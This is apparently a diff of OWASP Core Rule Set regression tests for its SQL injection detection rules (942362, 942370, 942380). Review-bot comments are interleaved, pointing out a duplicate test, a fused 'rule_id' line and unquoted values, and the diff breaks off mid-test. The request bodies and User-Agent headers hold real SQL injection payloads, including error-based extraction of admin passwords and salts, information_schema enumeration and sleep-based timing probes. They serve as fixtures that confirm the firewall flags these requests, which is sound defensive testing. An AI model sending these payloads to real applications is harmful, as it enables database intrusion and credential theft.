version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 28 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "6 As\" from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "6 As\" from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 29 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as day1 FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as day1 FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_id: 30 desc: GH issue 1580 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ", aside from" - version: HTTP/1.0 - 
output: - no_log_contains: id "942362" - - test_title: 942362-31 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ", aside from" + version: HTTP/1.0 + output: + no_log_contains: id "942362" + - test_id: 31 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/create" - version: HTTP/1.0 - output: - no_log_contains: id "942362" - - test_title: 942362-32 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/create" + version: HTTP/1.0 + output: + no_log_contains: id "942362" + - test_id: 32 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/CREATE TABLE Persons" - version: HTTP/1.0 - output: - log_contains: id "942362" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log_contains: id "942362" 
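Review bot: On the new side, `test_id: 18` and `test_id: 23` carry the identical payload `data: ") AS schlagwoerter FROM"` with the same `desc` and the same expectation `log_contains: id "942362"`, so test 23 adds no coverage. The duplicate predates this commit, but since every test in the file is renumbered here anyway, this is the cheapest point to drop it or give it a distinct payload before the new numbering is relied upon elsewhere. If it is removed, the remaining tests 24–32 would need to be renumbered again, so it is worth deciding before this lands.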
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml index a071e20b2..b351ecc2a 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml @@ -6,11 +6,9 @@ meta: WARNING: these tests were derived from the existing expressions and are semantically meaningless. The tests were used to ensure that a change to the assembly file would not change the semantics. - If you know what a particular expression is supposed to catch, please revise the associated test. - enabled: true - name: 942370.yaml + If you know what a particular expression is supposed to catch, please revise the associated test.rule_id: 942370 tests: - - test_title: 942370-1 + - test_id: 1 desc: | [\"'`]\s*?\*.+or\W*?[\"'`]\d [\"'`]\s*?\*.+xor\W*?[\"'`]\d 
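Review bot: On the new side of this hunk `rule_id: 942370` is fused onto the end of the description text (`...please revise the associated test.rule_id: 942370`), so it becomes the last line of the `description: |` block scalar instead of a key under `meta`, and `meta.rule_id` does not exist after this change. The hunk counts (`-6,11 +6,9`) are consistent with this being a single added line rather than an artifact of the collapsed rendering, though the layout makes it hard to be fully certain. The fix is to split it into two lines, `    If you know what a particular expression is supposed to catch, please revise the associated test.` followed by `  rule_id: 942370` at the `meta` indentation, and to check whether the same tooling produced the same fusion in other files whose `description` is a block scalar.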
@@ -19,93 +17,88 @@ tests:
 [\"'`]\s*?\*.+between\W*?[\"'`]\d
 [\"'`]\s*?\*.+and\W*?[\"'`]\d
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=' * from = 1 or '9"
- version: HTTP/1.0
- output:
- log_contains: id "942370"
- - test_title: 942370-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=' * from = 1 or '9"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942370"
+ - test_id: 2
 desc: |
 [\"'`]\s*?\*.+id\W*?[\"'`]\d
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=' * from = 1 id '9"
- version: HTTP/1.0
- output:
- log_contains: id "942370"
- - test_title: 942370-3
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=' * from = 1 id '9"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942370"
+ - test_id: 3
 desc: |
 [^\w\s?]+\s*?[^\w\s]+\s*?[\"'`"]
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=' = # '"
- version: HTTP/1.0
- output:
- log_contains: id "942370"
- - test_title: 942370-4
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=' = # '"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942370"
+ - test_id: 4
 desc: |
 [^\w\s]+\s*?[\W\d].*?#
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=' ? # = #"
- version: HTTP/1.0
- output:
- log_contains: id "942370"
- - test_title: 942370-5
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=' ? # = #"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942370"
+ - test_id: 5
 desc: |
 [^\w\s]+\s*?[\W\d].*?--
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var='? # = --"
- version: HTTP/1.0
- output:
- log_contains: id "942370"
- - test_title: 942370-6
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var='? # = --"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942370"
+ - test_id: 6
 desc: |
 [\"'`]\s*?or\s[^\d]+[\w-]+.*?\d
 [\"'`]\s*?xor\s[^\d]+[\w-]+.*?\d
@@ -114,102 +107,96 @@ tests:
 [\"'`]\s*?between\s[^\d]+[\w-]+.*?\d
 [\"'`]\s*?and\s[^\d]+[\w-]+.*?\d
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=' or homer 9"
- version: HTTP/1.0
- output:
- log_contains: id "942370"
- - test_title: 942370-7
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=' or homer 9"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942370"
+ - test_id: 7
 desc: |
 \^[\"'`]
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=^'"
- version: HTTP/1.0
- output:
- log_contains: id "942370"
- - test_title: 942370-8
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=^'"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942370"
+ - test_id: 8
 desc: |
 [\"'`].*?\*\s*?\d
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=\"` * 12344"
- version: HTTP/1.0
- output:
- log_contains: id "942370"
- - test_title: 942370-9
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=\"` * 12344"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942370"
+ - test_id: 9
 desc: |
 [()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,]
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=>foo##'."
- version: HTTP/1.0
- output:
- log_contains: id "942370"
- - test_title: 942370-10
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=>foo##'."
+ version: HTTP/1.0
+ output:
+ log_contains: id "942370"
+ - test_id: 10
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: 1"and json_search (json_array(password),0b11000010110110001101100,"t_______________")#
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get"
- version: HTTP/1.0
- output:
- log_contains: id "942370"
- - test_title: 942370-11
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: 1"and json_search (json_array(password),0b11000010110110001101100,"t_______________")#
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942370"
+ - test_id: 11
 desc: encode(lo_get(16400),'base64')::int
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: encode(lo_get(16400),'base64')::int
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get"
- version: HTTP/1.0
- output:
- log_contains: id "942370"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: encode(lo_get(16400),'base64')::int
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942370"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml
index d229d33f4..f28a16c3d 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml
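Review bot: The `User-Agent` values carried into the new `- input:` blocks of test_id 10 and 11 are still plain (unquoted) scalars although they contain `"`, `'`, parentheses, commas and, for test 10, a trailing `#`; they parse only because no `: ` or ` #` sequence happens to occur, so a later edit to the payload could silently truncate the value or break the document. Quote them like the other header values in this hunk, e.g. `User-Agent: '1"and json_search (json_array(password),0b11000010110110001101100,"t_______________")#'` and `User-Agent: "encode(lo_get(16400),'base64')::int"`, and likewise the plain `desc:` of test 11; the unquoted `Accept:` lines throughout this file have the same exposure, which the preceding 942362 hunk of this commit avoids by quoting them. test_id 10 also has no `desc:` while every other test in the file documents its payload; a one-line `desc:` naming what the request exercises would keep the file consistent.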
@@ -2,771 +2,724 @@ meta: author: "Christoph Hansen, azurit" description: None - enabled: true - name: 942380.yaml tests: - - test_title: 942380-1 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from `db_miwf`.`sys_refindex` limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-2 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-3 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from `information_schema`.tables limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-4 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ORder by" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-5 - desc: "SQL 
Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ordeR by" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-6 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-7 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-8 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-9 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - 
data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-10 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-11 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-12 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-13 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id 
"942380" - - test_title: 942380-14 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT 'qzxjq'||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-15 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute php" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-16 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-17 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Execute(" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-18 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-19 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-20 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-21 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-22 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "HAVING+1%3D" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-23 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute+elysi" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-24 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-25 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 
80 - uri: "/post" - data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-26 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-27 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-28 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 